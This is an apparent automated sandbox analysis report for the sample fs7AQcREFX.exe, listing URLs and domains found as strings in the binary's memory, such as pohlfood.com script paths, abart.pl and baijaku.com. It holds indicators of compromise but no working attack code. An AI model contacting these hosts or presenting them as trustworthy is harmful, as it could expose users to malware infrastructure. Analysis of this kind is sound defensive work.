00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/imagesloaded.min.js?ver=4.1.4
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.17
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5e1906bec96d1e3fc9ce
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5e1906bec96d1e3fc9ce5c4f
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5e1906bec96d1e3fc9ce5c4f1
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/underscore.min.js?ver=1.13.4
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/wp-util.min.js?ver=5e1906bec96d1e3fc9ce5c4f198cbceb
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493212132.0000000003230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://statcounter.com/
                      Source: fs7AQcREFX.exe, 00000000.00000002.716832808.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://von.olras.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.617704098.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.pupi.cz/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.railbook.net/
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.11tochi.net/
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.11tochi.net/CW
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.11tochi.net/iW
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626889052.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.2print.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.762justice.com
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393585434.0000000006191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abart.pl/
                      Source: fs7AQcREFX.exe, 00000000.00000003.393651051.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abart.pl/2
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393585434.0000000006191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abart.pl/6
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abart.pl/A
                      Source: fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abart.pl/m/.
                      Source: fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abart.pl/s
                      Source: fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abart.pl/v1.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.626889052.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abdg.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abdg.com/$
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abdg.com/a-
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aevga.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aevga.com/(
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aevga.com/9
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aevga.com/L
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aevga.com/x
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.alantron.com.tr
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.alantron.net
                      Source: fs7AQcREFX.exe, 00000000.00000003.391362964.00000000061B6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.391488204.00000000061B6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.505979031.000000000617C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626889052.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/
                      Source: fs7AQcREFX.exe, 00000000.00000003.505979031.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/R
                      Source: fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/osoft
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.asdoptics.com
                      Source: fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/%8H
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/aenh.dll
